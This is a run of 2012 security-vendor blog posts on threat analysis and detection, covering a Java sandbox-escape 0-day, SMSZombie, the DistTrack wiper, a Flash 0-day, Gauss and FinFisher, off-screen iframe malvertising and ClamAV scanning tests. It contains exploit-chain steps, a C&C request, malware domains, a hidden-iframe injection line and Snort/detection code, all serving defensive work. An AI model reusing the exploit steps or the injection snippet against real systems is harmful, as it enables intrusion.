Tuesday, August 28, 2012

CVE-2012-4681: bypassing built-in java security


A new Java 0-day is running rampant around the internet this week. With a code paste Sunday night and a Metasploit module coming in early yesterday morning, along with myriad research and blog posts, this Java vuln is sure to be the topic of the week. Based on information in the pastie link and the usage of the Gondzz and Gondvv class files in the alienvault blog post, plus analysis we've done on the samples we've seen in the wild, we've deduced that the exploit runs as follows:

-Use the Statement() method to set up a new SecurityManager.
-Create an object with the following attributes:
    a. A Permissions object with AllPermission set.
    b. A ProtectionDomain for the URL, using the local file "file:///"
    c. An AccessControlContext set up for that ProtectionDomain
-Call the user-defined function SetField with the string "acc", passing along localStatement to complete the object.
-Inside that function, set an Expression with getField using the variables passed in. Additionally, call another user-defined function, GetClass.
-In GetClass, finish setting up the object with a last Expression, passed the string forName (for acc, an AccessControlContext field) in the class sun.awt.SunToolkit. This replaces the default value of the AccessControlContext object with the one for acc.
-Once the function has returned, run .execute() on the Expression objects.
-At the top level, execute the now fully populated Statement and presumably have full local execution access.



In each case of Statement or Expression, there is a call to var.execute() which takes the statement that has been created as a string and executes it as code. There are two specific access violations that occur during the execution of the code:
-Accessing the "acc" field using Class.forName.
-Using getField on sun.awt.SunToolkit, a restricted package.

By using Statement and Expression methods to make these calls, they bypass access violation checks. Once the code has created a file with admin rights on the system, it can call calc.exe like in the POC or download a trojan like the exploit in the wild does.

The scariest part about all of this is that the next scheduled Oracle patch release is October 16. As Oracle has a policy of not issuing out-of-band updates, this means nearly two months of time where attackers can exploit this without root mitigation by the vendor. In the interim, security researcher Michael Schierl has released an unofficial patch, which is for now only available by request.

Meanwhile, we've released SIDs 24020 to 24028 and 24036 to 24038 to cover this in Snort, and JAVA.Exploit.Agent, JAVA.Exploit.Agent-1, JAVA.Exploit.Agent-2 and WIN.Trojan.Agent-131 on the ClamAV side. We'd urge you to add these to your setup as soon as possible (especially since the authors of the Blackhole exploit kit are incorporating this vulnerability already), and to consider disabling Java in whatever browsers you can.

[Ed.: Oracle released a patch to address this issue on August 30. While done without much explanation or fanfare, well-done to the security folks at Oracle for getting on top of this issue so quickly.]

Tuesday, August 21, 2012

SMSZombie: A New Twist on C&C

One of the most virulent pieces of Android malware to date was recently discovered by TrustGo Labs. Dubbed SMSZombie, this malicious application has infected some 500,000 users throughout China, after having been distributed through the GFan mobile application marketplace.

In some ways, the malware is not particularly novel, as it uses photographs of scantily clad ladies to lure in unsuspecting users, a trend we've observed across many distinct types of Android malware:


What's surprising about it is the fact that its command and control traffic is sent entirely over SMS, instead of the more traditional HTTP or other TCP-based packet. This behavior can be observed very rapidly after installing the application (which kindly returns you to the installer screen if you hit cancel instead of install, making it exceptionally obnoxious to remove); the following two messages were sent when we ran it in our lab:

Number: 13093632006
Message: 1.5V:ModelGT-I9000;os2.1-update1;Languageen;NET3G

Number: 13093632006
Message: The program runs again


Interestingly enough, while examining the APK files for keys to detection, we noticed some odd artifacts left by the authors, including an apparent Chinese name of "baoxian zhushou". While that name alone is insufficient for detection - it pulls up legitimate apps in the Google Play store - combined with the name of one of the JPEG files included in the package, it makes for a solid way to find all variants we've observed of this malware.

Since IDS analysts of any stripe are unable to detect SMS messages being sent, we urge mobile providers to watch for these numbers and other related activity as best they can. We're providing Snort SID 23954 to look for patterns we've detected within the malicious APKs themselves, in case it can be blocked at the HTTP level during a download (depending upon the particular environment being protected).

In the meantime, concerned users should be examining their Android antivirus solution for protection. While TrustGo claims that theirs is the only antivirus solution capable of detection, ClamAV detects this malicious app as Andr.Trojan.SMSZombie, and the recently released FireAMP mobile client will detect it as well.

Stay safe out there!

Thursday, August 16, 2012

New Threat: DistTrack

Sourcefire is aware of at least one ongoing incident in the energy vertical involving a threat named "DistTrack".  This is a new, destructive threat that has not previously been seen in the wild.  At this time, the earliest known sightings were on 8/14.  Preliminary indications are that this malware is currently targeted in nature, as no wide-spread activity has been detected.

This threat involves several files that perform different functions.  The core of the malware set is a 32-bit executable named trksvr.exe and is internally identified as "Distributed Link Tracking Server".  This file purports to be from Microsoft Corporation with a version number of 5.2.3790.0.  This file is responsible for dropping additional files involved in the malware set.  In some cases this file has been reported as str.exe.

The trksvr.exe file drops three files: a reporter executable, a data destruction executable and a 64-bit executable, also named trksvr.exe, that runs as a service.  The reporter executable is responsible for communicating with a C&C server.  An interesting part of this executable is that it's hard-coded with the C&C address in the .rdata block, as well as a URL for communicating.  The URL in .rdata is /ajax_modal/modal/data.asp and the construct for reporting is http://%s%s?%s=%s&%s=%s&state=%d (you'll see the parameter names mydata and uid as separate unicode strings in .rdata as well).  While communicating with the C&C server, it uses "you" as the user-agent string.  The request appears on the wire as:

GET /ajax_modal/modal/data.asp?mydata=AA==&uid=aaa.bbb.ccc.ddd&state=3067203 HTTP/1.0
User-Agent: you
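The following is an added example, not Sourcefire's own detection logic: it flags DistTrack-style check-ins from the indicators quoted above (the hard-coded URI, the mydata/uid/state parameter names and the "you" User-Agent). The two HTTP requests at the bottom are constructed for the demonstration.

```python
# Added example, not Sourcefire's own detection: flags DistTrack-style
# check-ins using the indicators quoted above (the hard-coded URI
# /ajax_modal/modal/data.asp, the mydata/uid/state parameter names and the
# "you" User-Agent). The two HTTP requests at the bottom are constructed.
from urllib.parse import urlsplit, parse_qs

DISTTRACK_PATH = "/ajax_modal/modal/data.asp"
DISTTRACK_UA = "you"


def parse_request(raw: str) -> dict:
    """Parse a minimal HTTP request (request line plus headers) into a dict."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break                      # end of headers
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def classify(raw: str) -> dict:
    """Report which DistTrack indicators a request matches.

    The exact User-Agent "you" and the reporter's fixed path each stand on
    their own; the parameter-name check only adds confidence once the path
    has matched, so a benign page that happens to use ?uid= is not flagged.
    """
    req = parse_request(raw)
    url = urlsplit(req["target"])
    params = set(parse_qs(url.query, keep_blank_values=True))
    ua_hit = req["headers"].get("user-agent") == DISTTRACK_UA
    path_hit = url.path == DISTTRACK_PATH
    params_hit = path_hit and {"mydata", "uid", "state"} <= params
    return {"ua": ua_hit, "path": path_hit, "params": params_hit,
            "verdict": ua_hit or path_hit}


# Constructed samples: the check-in shown in the post and a benign request
# whose User-Agent merely contains the word "you".
CHECKIN = ("GET /ajax_modal/modal/data.asp?mydata=AA==&uid=aaa.bbb.ccc.ddd"
           "&state=3067203 HTTP/1.0\r\nUser-Agent: you\r\n\r\n")
BENIGN = ("GET /index.html HTTP/1.1\r\nHost: example.com\r\n"
          "User-Agent: Mozilla/5.0 (you know)\r\n\r\n")

if __name__ == "__main__":
    for name, sample in (("check-in", CHECKIN), ("benign", BENIGN)):
        print(name, classify(sample))
```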


The danger from this malware comes from the data destruction component.  In short, this application does not pull any punches.  Four hours after infection, it overwrites data files with a portion of a jpeg file, targeting files in "Documents and Settings", "Users", "Windows\System32\Drivers" and "Windows\System32\Config".  Once this is done the file overwrites the MBR of the machine, rendering it unable to boot.  Any analysis of this malware should occur only on virtual machines or on computers you are ready to completely rebuild.

Analysis of this threat and its behavior in the wild are ongoing.  Detection for these threats is already in place for FireAMP, Snort and ClamAV.  In IPS mode, Snort will prevent contact with the command and control server and identify infected hosts.  Protection is provided by ClamAV and FireAMP.  Additionally, FireAMP's Threat Root Cause and quarantining capability will provide additional incident response and mitigation capability.  Here is a list of currently available detection:

FireAMP : W32.Distrack.AP
ClamAV : Win.Trojan.DistTrack
ClamAV : Win.Trojan.DistTrack-1
Snort: BOTNET-CNC Win.Trojan.DistTrack command and control traffic (23893)
Snort: BLACKLIST User-Agent known malicious user agent - you (23903)

Additional detection will be released as analysis and research generate further actionable data.

You know, it isn't often that we can say something is targeted and also talk about a widely distributed, devastating payload like this one.  While all the facts aren't yet available, someone somewhere made a very interesting decision.

CVE-2012-1535: Flash 0-day In The Wild

Yesterday Adobe released APSB12-18, which addressed CVE-2012-1535. As noted in the Adobe bulletin, the vulnerability has been actively exploited in the wild, though primarily in targeted attacks wrapped in Microsoft Word documents.

The VRT was able to obtain a sample of one of the documents that has been circulating in the wild, and has created several new rules that detect it. While the vulnerability itself is complex - as are most Flash issues - there are several extremely obvious indicators of malicious intent in the file, including plaintext strings and several unencoded, unobfuscated characters commonly associated with heap spray techniques. Given that even compressing the Flash - which is trivial to do, and commonly found in the field - would have obscured these indicators, we're a bit puzzled as to why the actors behind these attacks chose not to do so, particularly since sending such an obviously malicious file presented them with the risk of having their 0-day attack discovered.

We've released several new rules today to detect this attack. SIDs 23853 and 23854 look for the underlying vulnerability, and 23856 and 23857 will detect the specific Flash files used in the document mentioned above. SIDs 23857 - 23862 look for different variants of the heap spray bytes used in this attack, that are common in other attacks in the field.

It's also worth noting that SIDs 18546 or 18549 (depending on the delivery mechanism - HTTP vs. SMTP, respectively), which look for Flash files embedded in Word documents, would have caught this attack prior to discovery by any party. While there are occasional legitimate uses for such documents, you may wish to consider enabling those rules in your particular environment - especially if you're willing to trade 0-day detection for the occasional false positive.

Friday, August 10, 2012

Gauss & FinFisher: The latest targeted malware everyone cares about.

This week has been a busy one for high-profile malware. A pair of new types of malware - Gauss and FinFisher - have people around the world worried, and media churning out concerned articles as fast as they can be written. Fortunately, the VRT has you covered, so you can spend the weekend relaxing instead of trying to ensure that you're safe from these threats.

Gauss is a recently discovered malware platform specifically designed to collect and steal credentials from targeted users for various email and instant messaging accounts, social networks, and banking systems. Gauss is "modular malware."  It contains various modules and ActiveX controls to do its bidding and its payload is fully encrypted.  Based on the data released by Kaspersky Labs, the vast majority of Gauss infections have been found in Lebanon, Israel, and Palestine. This surprisingly small geographic region indicates it's likely a targeted attack.

Behavioral analysis reveals the malicious command and control domains for Gauss:
[a-c].guest-access.net
[a-c].dotnetadvisor.info
[a-c].bestcomputeradvisor.com
[a-c].datajunction.org
[a-c].secuurity.net
[a-c].gowin7.com

Snort SIDs 23799 through 23804 cover attempts to contact these known malicious C&C servers. Additionally, SID 23824 covers the HTTP request made after resolving the C&C, which is unique enough to ensure a minimal to nonexistent false positive rate. As these rules have yet to be released, we're providing them here so that you can load them over the weekend if your organization is concerned:

alert udp $HOME_NET any -> any 53 (msg:"BLACKLIST DNS request for known malware domain guest-access.net - Gauss"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|0C|guest-access|03|net|00|"; fast_pattern:only; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service dns; reference:url,gauss.crysys.hu/; reference:url,www.securelist.com/en/blog/208193767/Gauss_Nation_state_cyber_surveillance_meets_banking_Trojan; classtype:trojan-activity; sid:23799; rev:1;)
alert udp $HOME_NET any -> any 53 (msg:"BLACKLIST DNS request for known malware domain dotnetadvisor.info - Gauss"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|0D|dotnetadvisor|04|info|00|"; fast_pattern:only; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service dns; reference:url,gauss.crysys.hu/; reference:url,www.securelist.com/en/blog/208193767/Gauss_Nation_state_cyber_surveillance_meets_banking_Trojan; classtype:trojan-activity; sid:23800; rev:1;)
alert udp $HOME_NET any -> any 53 (msg:"BLACKLIST DNS request for known malware domain bestcomputeradvisor.com - Gauss"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|13|bestcomputeradvisor|03|com|00|"; fast_pattern:only; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service dns; reference:url,gauss.crysys.hu/; reference:url,www.securelist.com/en/blog/208193767/Gauss_Nation_state_cyber_surveillance_meets_banking_Trojan; classtype:trojan-activity; sid:23801; rev:1;)
alert udp $HOME_NET any -> any 53 (msg:"BLACKLIST DNS request for known malware domain datajunction.org - Gauss"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|0C|datajunction|03|org|00|"; fast_pattern:only; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service dns; reference:url,gauss.crysys.hu/; reference:url,www.securelist.com/en/blog/208193767/Gauss_Nation_state_cyber_surveillance_meets_banking_Trojan; classtype:trojan-activity; sid:23802; rev:1;)
alert udp $HOME_NET any -> any 53 (msg:"BLACKLIST DNS request for known malware domain secuurity.net - Gauss"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|09|secuurity|03|net|00|"; fast_pattern:only; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service dns; reference:url,gauss.crysys.hu/; reference:url,www.securelist.com/en/blog/208193767/Gauss_Nation_state_cyber_surveillance_meets_banking_Trojan; classtype:trojan-activity; sid:23803; rev:1;)
alert udp $HOME_NET any -> any 53 (msg:"BLACKLIST DNS request for known malware domain gowin7.com - Gauss"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|06|gowin7|03|com|00|"; fast_pattern:only; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service dns; reference:url,gauss.crysys.hu/; reference:url,www.securelist.com/en/blog/208193767/Gauss_Nation_state_cyber_surveillance_meets_banking_Trojan; classtype:trojan-activity; sid:23804; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BOTNET-CNC Gauss malware check-in"; flow:to_server,established; content:"/userhome.php?sid="; nocase; http_uri; content:"&uid="; distance:0; nocase; http_uri; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service http; reference:url,gauss.crysys.hu/; reference:url,www.securelist.com/en/blog/208193767/Gauss_Nation_state_cyber_surveillance_meets_banking_Trojan; classtype:trojan-activity; sid:23824; rev:1;)
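To make the DNS rules above concrete, here is an added example (not part of Snort or the VRT's tooling) that encodes a domain the way it appears in a DNS query and applies the two tests each rule performs. It assumes nothing beyond RFC 1035 wire format; the DNS packets it builds are constructed for the demonstration.

```python
# Added example (not part of Snort): shows what the Gauss DNS rules above
# match on the wire. A query name travels as length-prefixed labels ending in
# a zero byte, which is exactly the |0C|guest-access|03|net|00| content
# string, and byte_test:1,!&,0xF8,2 requires the byte at offset 2 to have
# none of the QR/Opcode/AA/TC bits set, i.e. a standard query rather than a
# response. The DNS packets below are constructed for the demonstration.
import struct
from typing import Optional

GAUSS_DOMAINS = ["guest-access.net", "dotnetadvisor.info",
                 "bestcomputeradvisor.com", "datajunction.org",
                 "secuurity.net", "gowin7.com"]


def wire_name(domain: str) -> bytes:
    """Encode a hostname as DNS wire-format labels (RFC 1035, section 3.1)."""
    out = b""
    for label in domain.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("label length must be 1..63: %r" % label)
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def snort_content(domain: str) -> str:
    """Render the wire name in Snort content notation: |HH| for each length
    byte, the label text as-is, |00| for the terminator."""
    labels = domain.rstrip(".").split(".")
    return "".join("|%02X|%s" % (len(lab), lab) for lab in labels) + "|00|"


def build_query(qname: str, txid: int = 0x1234, flags: int = 0x0100) -> bytes:
    """Build a minimal A/IN query; the default flags are a standard query
    with RD set (QR=0, Opcode=0)."""
    header = struct.pack(">HHHHHH", txid, flags, 1, 0, 0, 0)
    return header + wire_name(qname) + struct.pack(">HH", 1, 1)


def matches_gauss_rule(dns_payload: bytes) -> Optional[str]:
    """Apply the rules' two tests to a UDP/53 payload and return the domain
    that matched, or None. Because the content holds only the registered
    domain's labels, a.guest-access.net and c.guest-access.net both match,
    which is how the rules cover the [a-c].* hosts listed above."""
    if len(dns_payload) < 12 or dns_payload[2] & 0xF8:
        return None                   # response, or non-standard opcode
    for domain in GAUSS_DOMAINS:
        if wire_name(domain) in dns_payload:
            return domain
    return None


if __name__ == "__main__":
    for d in GAUSS_DOMAINS:
        print(snort_content(d))
    print(matches_gauss_rule(build_query("b.dotnetadvisor.info")))
```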

Detecting Gauss locally is arguably harder. Of the two sample DLLs the VRT has come across, both used the following decryption routine:


Detecting the above decryption subroutine provides reliable local detection for the samples we have encountered and should cover other variants. ClamAV signatures W32.Trojan.Gauss-1 through W32.Trojan.Gauss-15 are what you need to ensure are enabled for AV coverage.

FinFisher, a piece of lawful intercept malware first discussed by Rapid7, uses a heavily encoded protocol for communicating with its C&C servers. While analysts are still working on cracking that data, it has an easily detectable signature of either 8 or 16 static bytes at the start of its packet types, which makes for a pair of trivial Snort signatures:

alert tcp $HOME_NET any -> $EXTERNAL_NET [22,53,80,443] (msg:"BOTNET-CNC FinFisher initial outbound connection attempt"; flow:to_server,established; content:"|0C 00 00 00 40 01 73 00|"; fast_pattern:only; metadata:impact_flag red; reference:url,community.rapid7.com/community/infosec/blog/2012/08/08/finfisher; classtype:trojan-activity; sid:23825; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET [22,53,80,443] (msg:"BOTNET-CNC FinFisher outbound connection attempt"; flow:to_server,established; content:"|5C 00 00 00 A0 02 72 00 0C 00 00 00 40 04 FE 00|"; fast_pattern:only; metadata:impact_flag red; reference:url,community.rapid7.com/community/infosec/blog/2012/08/08/finfisher; classtype:trojan-activity; sid:23826; rev:1;)
ClamAV coverage is equally trivial, as the malware contains a batch file in clear text that is used to remove the initial binaries dropped on the system. If you've got Trojan.FinFisher enabled, you're golden.

Tuesday, August 7, 2012

Stupid CSS Tricks

As has been well-demonstrated by the Blackhole Exploit Kit's "Loading, Please Wait..." page, people browsing the web are most likely to allow a malicious page to complete whatever action it is attempting to execute when they see no signs of strange activity on that page. Malware authors have taken note of this over the years, and go to great lengths to hide, obscure, or otherwise make invisible any part of a page that might look out of place to even the most casual of observers.

One of the classic techniques for doing so is to make use of hidden HTML iframe tags. As with anything HTML-based, there are an essentially infinite number of ways that the same effect can be achieved; height and width values can be set directly as attributes of the tag, or CSS style properties can be tweaked either inline in the tag itself, or as part of a piece of associated JavaScript.

The VRT has observed a recent malvertising campaign in the wild that puts a new spin on this old idea. Instead of specifying size values so small that the iframe never renders, the technique being used here abuses the CSS positioning attributes, by specifying absolute values of -1,000 for both the "left" and "top" parameters. As the iframe is declared to be 6x10 pixels in size, the browser considers it to be so far off the edge of the screen that it never even attempts to render it for the user:

document.write('<iframe height="10" src="http://<redacted>.org/route.htm" style="left: -1000px; position: absolute; top: -1000px; z-index: 1;" width="6" ></iframe>');
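As an added illustration (not SID 23618 or any VRT code), the following checker pulls iframe tags out of a page, including ones written via document.write(), and reports why a frame would never be visible. The sample page, the redacted host name and the off-screen threshold are assumptions.

```python
# Added example (not SID 23618 itself): a checker that flags iframes parked
# far off-screen the way the malvertising snippet above does. It pulls every
# <iframe ...> tag out of a page, including ones inside document.write()
# strings, reads the inline style and size attributes, and lists why the
# frame would never be visible. The page and the threshold are assumptions.
import re
from typing import Dict, List, Optional, Tuple

OFFSCREEN_PX = 500      # assumed cut-off; the campaign used -1000px
TINY_PX = 10            # width/height at or below this is effectively hidden

TAG_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def parse_attrs(attr_text: str) -> Dict[str, str]:
    """Map attribute names to values for one tag (either quote style)."""
    return {m.group(1).lower(): m.group(2) or m.group(3) or m.group(4) or ""
            for m in ATTR_RE.finditer(attr_text)}


def parse_style(style: str) -> Dict[str, str]:
    """Split 'left: -1000px; position: absolute;' into a property map."""
    props = {}
    for decl in style.split(";"):
        name, _, value = decl.partition(":")
        if name.strip():
            props[name.strip().lower()] = value.strip().lower()
    return props


def px(value: str) -> Optional[int]:
    """Parse '6', '10px' or '-1000px' to an int; None for anything else."""
    m = re.fullmatch(r"(-?\d+)(?:px)?", value.strip())
    return int(m.group(1)) if m else None


def hidden_reasons(attrs: Dict[str, str]) -> List[str]:
    """Why this iframe would not be seen: parked off-screen and/or tiny."""
    style = parse_style(attrs.get("style", ""))
    reasons = []
    if style.get("position") == "absolute":
        for side in ("left", "top"):
            v = px(style.get(side, ""))
            if v is not None and v <= -OFFSCREEN_PX:
                reasons.append("%s=%dpx" % (side, v))
    for dim in ("width", "height"):
        v = px(attrs.get(dim) or style.get(dim, ""))
        if v is not None and v <= TINY_PX:
            reasons.append("%s=%dpx" % (dim, v))
    return reasons


def find_hidden_iframes(page: str) -> List[Tuple[str, List[str]]]:
    """Return (src, reasons) for each iframe that looks deliberately hidden."""
    hits = []
    for m in TAG_RE.finditer(page):
        attrs = parse_attrs(m.group(1))
        reasons = hidden_reasons(attrs)
        if reasons:
            hits.append((attrs.get("src", ""), reasons))
    return hits


# Constructed page: the off-screen frame from the campaign (host replaced)
# next to an ordinary, visible video embed.
SAMPLE_PAGE = """<html><body>
<script>document.write('<iframe height="10" src="http://redacted.example/route.htm" style="left: -1000px; position: absolute; top: -1000px; z-index: 1;" width="6" ></iframe>');</script>
<iframe src="https://video.example/embed/1" width="640" height="360"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, why in find_hidden_iframes(SAMPLE_PAGE):
        print(src, why)
```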

Fortunately, this particular variant makes for an easy signature, as no legitimate iframes will ever be placed in such a ludicrous spot on the page; SID 23618 will do the job nicely. In the meantime, the VRT is continuing to follow new developments in iframe obfuscation, with an eye towards generically detecting malicious hidden iframes. As always, if you see something malicious on your network that we're not currently providing coverage for, please send us a sample at vrt at sourcefire dot com, so that our detection can be improved for you and for the entire Snort user base.

Monday, August 6, 2012

ClamAV vs. Content IQ Test, part 4

This is the fourth in a series of five blog posts about the Content IQ Test. Please see ClamAV vs. Content IQ Test, part 1, ClamAV vs. Content IQ Test, part 2 and ClamAV vs. Content IQ Test, part 3.

How would ClamAV do against dangerous VBA (Visual Basic for Applications) embedded in Office documents?

Test file 22 has the target string contained in VBA embedded in a Powerpoint file.

azidouemba@ubuntu:~/Downloads$ cat test.ldb 
TestSig2;Target:0;(0|1);6576616c{-200}756e657363617065{-200}282725363525373625363925366325323825323927;6500760061006c{-200}75006e006500730063006100700065{-200}2800270025003600350025003700360025003600390025003600630025003200380025003200390027
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_22_Ts_in_Vba_in_Ppt.pptm 
Test_File_22_Ts_in_Vba_in_Ppt.pptm: TestSig2.UNOFFICIAL FOUND

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.30 MB
Data read: 0.32 MB (ratio 0.96:1)
Time: 0.449 sec (0 m 0 s)

azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_22_Negative_Control.pptm
Test_File_22_Negative_Control.pptm: OK

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.68 MB
Data read: 0.31 MB (ratio 2.16:1)
Time: 0.069 sec (0 m 0 s)

A PPTM file is a macro-enabled Powerpoint Presentation file and follows the Microsoft Office OpenXML format, which combines XML and ZIP compression. ClamAV treats PPTM files as archives and has no problem seeing the following in one of the files within that archive:

[snip]
00000600  01 00 00 20 00 1c 02 b6  00 2d 00 65 76 61 6c 28  |... .....-.eval(|
00000610  75 6e 65 73 63 61 70 65  28 27 25 36 35 25 37 36  |unescape('%65%76|
00000620  25 36 39 25 36 63 25 32  38 25 32 39 27 29 29 20  |%69%6c%28%29')) |
00000630  3d 20 65 76 69 6c 28 29  00 11 00 20 00 1e 02 11  |= evil()... ....|
[/snip]

Test files 23, 24 and 25 are respectively Word, Excel and Powerpoint Show files that have the target string contained in an embedded VBA script. Similarly to test file 22, ClamAV treats these DOCM, XLSM and PPSM files as archives. See below:


azidouemba@ubuntu:~/Downloads$ cat test.ldb 
TestSig2;Target:0;(0|1);6576616c{-200}756e657363617065{-200}282725363525373625363925366325323825323927;6500760061006c{-200}75006e006500730063006100700065{-200}2800270025003600350025003700360025003600390025003600630025003200380025003200390027
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_23_Ts_in_Vba_in_Doc.docm 
Test_File_23_Ts_in_Vba_in_Doc.docm: TestSig2.UNOFFICIAL FOUND

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.00 MB
Data read: 0.34 MB (ratio 0.00:1)
Time: 0.013 sec (0 m 0 s)
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_23_Negative_Control.docm 
Test_File_23_Negative_Control.docm: OK

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.72 MB
Data read: 0.34 MB (ratio 2.14:1)
Time: 0.086 sec (0 m 0 s)
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_24_Ts_in_Vba_in_Xls.xlsm 
Test_File_24_Ts_in_Vba_in_Xls.xlsm: TestSig2.UNOFFICIAL FOUND

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.04 MB
Data read: 0.29 MB (ratio 0.14:1)
Time: 0.017 sec (0 m 0 s)
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_24_Negative_Control.xlsm 
Test_File_24_Negative_Control.xlsm: OK

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.59 MB
Data read: 0.29 MB (ratio 2.01:1)
Time: 0.159 sec (0 m 0 s)
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_25_Ts_in_Vba_in_Pps.ppsm 
Test_File_25_Ts_in_Vba_in_Pps.ppsm: TestSig2.UNOFFICIAL FOUND

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.30 MB
Data read: 0.32 MB (ratio 0.96:1)
Time: 0.051 sec (0 m 0 s)
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_25_Negative_Control.ppsm 
Test_File_25_Negative_Control.ppsm: OK

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.68 MB
Data read: 0.31 MB (ratio 2.16:1)
Time: 0.063 sec (0 m 0 s)


Test file 26 is a file that has the target string contained in an executable file embedded in a PDF file.


azidouemba@ubuntu:~/Downloads$ cat test.ldb 
TestSig2;Target:0;(0|1);6576616c{-200}756e657363617065{-200}282725363525373625363925366325323825323927;6500760061006c{-200}75006e006500730063006100700065{-200}2800270025003600350025003700360025003600390025003600630025003200380025003200390027
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_26_Ts_in_Exe_in_Pdf.pdf 
Test_File_26_Ts_in_Exe_in_Pdf.pdf: TestSig2.UNOFFICIAL FOUND

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.02 MB
Data read: 0.01 MB (ratio 2.00:1)
Time: 0.011 sec (0 m 0 s)
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_26_Negative_Control.pdf 
Test_File_26_Negative_Control.pdf: OK

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.02 MB
Data read: 0.01 MB (ratio 3.00:1)
Time: 0.011 sec (0 m 0 s)


ClamAV was able to determine that an executable was embedded in the PDF file, extracted it and found the following in it:

[snip]
000025e0  6e 00 67 00 73 00 21 00  0a 00 0a 00 00 4d 65 00  |n.g.s.!......Me.|
000025f0  76 00 61 00 6c 00 28 00  75 00 6e 00 65 00 73 00  |v.a.l.(.u.n.e.s.|
00002600  63 00 61 00 70 00 65 00  28 00 27 00 25 00 36 00  |c.a.p.e.(.'.%.6.|
00002610  35 00 25 00 37 00 36 00  25 00 36 00 39 00 25 00  |5.%.7.6.%.6.9.%.|
00002620  36 00 63 00 25 00 32 00  38 00 25 00 32 00 39 00  |6.c.%.2.8.%.2.9.|
00002630  27 00 29 00 29 00 0a 00  0a 00 01 5f 49 00 66 00  |'.).)......_I.f.|
00002640  20 00 74 00 68 00 69 00  73 00 20 00 68 00 61 00  | .t.h.i.s. .h.a.|
[/snip]

Test file 27 consists of the target string contained in an executable file embedded in a PDF file in a polymorphic Zip file. We can take an educated guess as to whether ClamAV will be able to find the target string in such a file, but let's look at the test results:

azidouemba@ubuntu:~/Downloads$ cat test.ldb 
TestSig2;Target:0;(0|1);6576616c{-200}756e657363617065{-200}282725363525373625363925366325323825323927;6500760061006c{-200}75006e006500730063006100700065{-200}2800270025003600350025003700360025003600390025003600630025003200380025003200390027
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_27_Ts_in_Exe_in_Pdf_in_Zip.zip 
Test_File_27_Ts_in_Exe_in_Pdf_in_Zip.zip: TestSig2.UNOFFICIAL FOUND

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.02 MB
Data read: 0.02 MB (ratio 1.00:1)
Time: 0.063 sec (0 m 0 s)
azidouemba@ubuntu:~/Downloads$ clamscan -d test.ldb Test_File_27_Negative_Control.zip 
Test_File_27_Negative_Control.zip: OK

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 0.97.4
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.05 MB
Data read: 0.01 MB (ratio 4.00:1)
Time: 0.016 sec (0 m 0 s)

Finding the target string in test file 27 is no harder for ClamAV than it is for us to open Russian dolls. ClamAV extracted the contents of the Zip archive, found and opened the PDF file. The PDF was analyzed and found to contain an executable that was extracted. In the executable, ClamAV came across the following string which caused it to alert:


[snip]
